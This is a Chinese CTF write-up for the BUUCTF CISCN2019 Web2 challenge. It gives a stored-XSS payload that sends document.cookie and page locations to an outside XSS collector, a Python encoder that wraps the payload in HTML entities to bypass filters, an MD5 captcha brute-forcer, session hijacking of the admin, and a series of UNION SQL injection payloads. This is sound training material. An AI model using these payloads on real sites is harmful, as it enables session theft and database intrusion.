经测试发现存在以下页面:
index.php
admin.php
login.php
register.php
post.php
commitbug.php
about.php

BUUCTF:[CISCN2019 华东北赛区]Web2_ci


admin.php没有权限登录,联系下文估计是要得到admin的session登录

BUUCTF:[CISCN2019 华东北赛区]Web2_html_02


投稿存在XSS,但是存在一些过滤,使用Markup 转码,然后eval执行JS代码,并且需要一个window.location.href来自动触发刷新颜面

使用题目提供的站内XSS平台

BUUCTF:[CISCN2019 华东北赛区]Web2_ci_03


添加windows.location.href,并删去if判断那一段

(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=arHAGx&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();

然后利用脚本,进行编码绕过,并且执行

xss='''(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=arHAGx&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();'''
output = ""
for c in xss:
    output += "&#" + str(ord(c))

print("<svg><script>eval("" + output + "")</script>")

BUUCTF:[CISCN2019 华东北赛区]Web2_ci_04


然后把这些payload插入投稿

文章地址:http://24175362-da9c-4f99-bb8d-110e10bfb9bf.node3.buuoj.cn/post/1b34bb5a26804f2410d6746d2129bb7b.html

BUUCTF:[CISCN2019 华东北赛区]Web2_php_05


在反馈页面反馈,刚刚发布的那篇文章,是的管理员去查看带有XSS的文章

MD5验证码脚本:

import hashlib

def func(md5_val):
    for x in range(999999, 100000000):
        md5_value=hashlib.md5(str(x)).hexdigest()
        if md5_value[:6]==md5_val:
            return str(x)

if __name__ == '__main__':
    print func('b76301')

BUUCTF:[CISCN2019 华东北赛区]Web2_html_06


这里注意文章地址在反馈的时候要改成

http://web.node3.buuoj.cn/post/1b34bb5a26804f2410d6746d2129bb7b.html

BUUCTF:[CISCN2019 华东北赛区]Web2_html_07


BUUCTF:[CISCN2019 华东北赛区]Web2_php_08


XSS平台接收到一个来自内网访问的请求,这就是管理元的访问,使用这个PHPSESSION登录admin.php

BUUCTF:[CISCN2019 华东北赛区]Web2_ci_09


登陆成功,经过测试发现是个很简单的联合查询注入,一系列注入payload如下:

-2 union select 1,2,3#

-2 union select 1,database(),user()#

-2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ciscn'#

-2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag'#

-2 union select 1,2,group_concat(flagg) from ciscn.flag#

BUUCTF:[CISCN2019 华东北赛区]Web2_html_10